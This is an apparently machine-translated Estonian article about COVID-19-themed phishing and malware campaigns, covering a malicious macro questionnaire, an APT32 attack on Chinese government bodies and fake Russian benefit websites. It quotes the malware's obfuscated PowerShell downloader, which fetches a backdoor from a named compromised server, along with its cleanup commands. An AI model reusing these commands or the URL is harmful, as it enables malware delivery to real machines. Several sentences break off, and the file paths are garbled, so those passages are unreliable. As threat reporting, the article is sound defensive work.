Ründajad jätkavad COVID-19 teema ärakasutamist, tekitades üha uusi ohte kasutajatele, kes on kõigest epideemiaga seonduvast väga huvitatud. IN
Pidage meeles
Kas soovite tasuta COVID-19 testi teha?
Teine märkimisväärne näide koroonaviiruse-teemalisest andmepüügist oli
Enamiku kasutajate veenmine makrosid lubama oli samuti lihtne. Selleks kasutati tavalist nippi: küsimustiku täitmiseks tuleb esmalt lubada makrod, mis tähendab, et tuleb käivitada VBA skript.
Nagu näete, on VBA skript spetsiaalselt viirusetõrjete eest varjatud.
Windowsil on ootefunktsioon, kus rakendus ootab /T <sekundit>, enne kui nõustub vaikevastusega "Jah". Meie puhul ootas skript 65 sekundit enne ajutiste failide kustutamist:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Ja oodates laaditi alla pahavara. Selle jaoks käivitati spetsiaalne PowerShelli skript:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Pärast Base64 väärtuse dekodeerimist laadib PowerShelli skript Saksamaalt alla varem häkitud veebiserveris asuva tagaukse:
http://automatischer-staubsauger.com/feature/777777.png
ja salvestab selle nime all:
C:UsersPublictmpdirfile1.exe
Kaust ‘C:UsersPublictmpdir’
kustutatakse käsku sisaldava faili 'tmps1.bat' käivitamisel cmd /c mkdir ""C:UsersPublictmpdir"".
Suunatud rünnak valitsusasutuste vastu
Lisaks teatasid FireEye analüütikud hiljuti sihipärasest APT32 rünnakust, mis oli suunatud Wuhani valitsusstruktuuridele ja Hiina hädaolukordade lahendamise ministeeriumile. Üks levitatud RTF-idest sisaldas linki New York Timesi artiklile pealkirjaga
Huvitav on see, et Virustotali andmetel ei tuvastanud ükski viirusetõrje seda juhtumit tuvastamise ajal.
Kui ametlikud veebisaidid on maas
Kõige ilmekam näide andmepüügirünnakust juhtus Venemaal just üleeile. Selle põhjuseks oli kauaoodatud hüvitise määramine lastele vanuses 3-16 aastat. Kui 12. mail 2020 teatati taotluste vastuvõtmise algusest, tormasid miljonid riigiteenistuse veebisaidile kauaoodatud abi otsima ja tõid portaali alla mitte hullemini kui professionaalne DDoS-rünnak. Kui president ütles, et "riigiteenistused ei saa taotluste vooluga hakkama", hakati veebis rääkima alternatiivse taotluste vastuvõtmise saidi käivitamisest.
Probleem on selles, et mitu saiti hakkas korraga tööle ja kuigi üks, päris sait aadressil posobie16.gosuslugi.ru, võtab taotlusi vastu,
SearchInformi kolleegid leidsid .ru tsoonist umbes 30 uut petudomeeni. Infosecurity ja Softline Company on alates aprilli algusest jälginud enam kui 70 sarnast võltsitud riigiteenuste veebisaiti. Nende loojad manipuleerivad tuttavate sümbolitega ja kasutavad ka kombinatsioone sõnadest gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie jne.
Hüpe ja sotsiaalne manipuleerimine
Kõik need näited vaid kinnitavad, et ründajad on koronaviiruse teemaga edukalt raha teeninud. Ja mida suurem on sotsiaalne pinge ja ebaselgemad probleemid, seda suurem on võimalus petturitel varastada olulisi andmeid, sundida inimesi iseseisvalt oma rahast loobuma või lihtsalt rohkem arvuteid häkkima.
Ja arvestades, et pandeemia on sundinud potentsiaalselt ettevalmistamata inimesi massiliselt kodus töötama, on ohus mitte ainult isiklikud, vaid ka ettevõtte andmed. Näiteks hiljuti sattusid andmepüügirünnaku alla ka Microsoft 365 (endine Office 365) kasutajad. Inimesed said kirjade manustena massiliselt "vastamata" häälsõnumeid. Kuid failid olid tegelikult HTML-leht, mis saatis rünnaku ohvrid
Allikas: www.habr.com